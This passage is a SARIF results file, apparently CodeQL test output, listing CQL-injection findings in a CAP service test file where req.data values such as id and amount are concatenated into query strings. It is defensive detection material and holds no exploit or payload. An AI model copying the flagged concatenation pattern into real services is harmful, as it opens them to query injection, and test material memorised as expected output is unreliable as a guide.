}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":412,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":414,"startColumn":58,"endColumn":60}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":414,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":415,"startColumn":20,"endColumn":25}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":412,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":412,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":422,"startColumn":20,"endColumn":25}}}],"partialFingerprints":{"primaryLocationLineHash":"80716f714482c84f:1","primaryLocationStartColumnFingerprint":"13"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":419,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":419,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":419,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":421,"startColumn":58,"endColumn":60}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":421,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":422,"startColumn":20,"endColumn":25}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":419,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":419,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":429,"startColumn":20,"endColumn":25}}}],"partialFingerprints":{"primaryLocationLineHash":"442267e255b8b54f:1","primaryLocationStartColumnFingerprint":"13"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":426,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":426,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":426,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":428,"startColumn":57,"endColumn":59}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":428,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":429,"startColumn":20,"endColumn":25}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":426,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":426,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":438,"startColumn":16,"endColumn":21}}}],"partialFingerprints":{"primaryLocationLineHash":"9e2cec8d31f74921:1","primaryLocationStartColumnFingerprint":"7"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":434,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":434,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":434,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":436,"startColumn":63,"endColumn":65}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":436,"startColumn":55,"endColumn":65}},"message":{"text":"\"ID=\" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":436,"startColumn":21,"endColumn":66}},"message":{"text":"SELECT. ... \" + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":436,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":438,"startColumn":16,"endColumn":21}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":434,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":434,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":446,"startColumn":9,"endColumn":53}}}],"partialFingerprints":{"primaryLocationLineHash":"73ba3ff2097c8fd1:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":443,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":443,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":443,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":446,"startColumn":50,"endColumn":52}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":446,"startColumn":41,"endColumn":52}},"message":{"text":"\"ID =\" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":443,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":443,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":446,"startColumn":41,"endColumn":52}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1).\nThis CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":462,"startColumn":9,"endColumn":86}}}],"partialFingerprints":{"primaryLocationLineHash":"b6b098d76a485f57:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":459,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":459,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":459,"startColumn":19,"endColumn":25}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":462,"startColumn":57,"endColumn":63}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":462,"startColumn":41,"endColumn":63}},"message":{"text":"\"col1 = ...  amount"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":459,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":459,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":459,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":462,"startColumn":83,"endColumn":85}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":462,"startColumn":71,"endColumn":85}},"message":{"text":"\"col1 = \" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":459,"startColumn":30,"endColumn":38}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":459,"startColumn":30,"endColumn":38}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":462,"startColumn":41,"endColumn":63}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":462,"startColumn":71,"endColumn":85}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":486,"startColumn":9,"endColumn":55}}}],"partialFingerprints":{"primaryLocationLineHash":"930f7b78e736551b:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":483,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":483,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":483,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":486,"startColumn":52,"endColumn":54}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":486,"startColumn":43,"endColumn":54}},"message":{"text":"\"ID =\" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":483,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":483,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":486,"startColumn":43,"endColumn":54}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":495,"startColumn":16,"endColumn":21}}}],"partialFingerprints":{"primaryLocationLineHash":"cd8266cd9539b760:1","primaryLocationStartColumnFingerprint":"7"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":492,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":492,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":492,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":493,"startColumn":63,"endColumn":65}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":493,"startColumn":55,"endColumn":65}},"message":{"text":"\"ID=\" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":493,"startColumn":21,"endColumn":66}},"message":{"text":"SELECT. ... \" + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":493,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":495,"startColumn":16,"endColumn":21}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":492,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":492,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":502,"startColumn":9,"endColumn":53}}}],"partialFingerprints":{"primaryLocationLineHash":"5298b55f76bd7434:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":500,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":500,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":500,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":502,"startColumn":50,"endColumn":52}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":502,"startColumn":41,"endColumn":52}},"message":{"text":"\"ID =\" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":500,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":500,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":502,"startColumn":41,"endColumn":52}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1).\nThis CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":516,"startColumn":9,"endColumn":86}}}],"partialFingerprints":{"primaryLocationLineHash":"f72e0c4e0d3cd372:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":514,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":514,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":514,"startColumn":19,"endColumn":25}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":516,"startColumn":57,"endColumn":63}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":516,"startColumn":41,"endColumn":63}},"message":{"text":"\"col1 = ...  amount"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":514,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":514,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":514,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":516,"startColumn":83,"endColumn":85}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":516,"startColumn":71,"endColumn":85}},"message":{"text":"\"col1 = \" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":514,"startColumn":30,"endColumn":38}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":514,"startColumn":30,"endColumn":38}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":516,"startColumn":41,"endColumn":63}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":516,"startColumn":71,"endColumn":85}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":537,"startColumn":9,"endColumn":55}}}],"partialFingerprints":{"primaryLocationLineHash":"d38ceeef8a2ac936:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":535,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":535,"startColumn":13,"endColumn":19}},"message":{"text":"{ id 